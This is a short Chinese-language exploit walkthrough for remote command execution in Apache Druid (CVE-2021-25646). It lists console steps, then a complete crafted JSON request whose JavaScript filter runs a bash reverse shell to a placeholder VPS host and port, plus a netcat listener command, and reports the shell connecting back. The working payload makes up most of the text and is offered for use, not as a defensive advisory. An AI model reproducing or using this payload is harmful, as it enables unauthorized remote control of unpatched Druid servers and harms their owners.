druid 远程命令执行(CVE-2021-25646)

1

2

将Firehose type配置为

local

将Base directory配置为

quickstart

将File filter配置为

wikiticker-2015-09-12-sampled.json.gz

3

确保功能点在parse datah上，开启抓包，点击右下角发包

4替换请求包

替换请求包为以下内容，注意替换IP与端口

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/VPSIP/PORT 0>&1')}",
 "dimension":"added",
 "":{
 "enabled":"true"
 }
 }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

开启监听

nc -lvvp 端口号

发包，成功反弹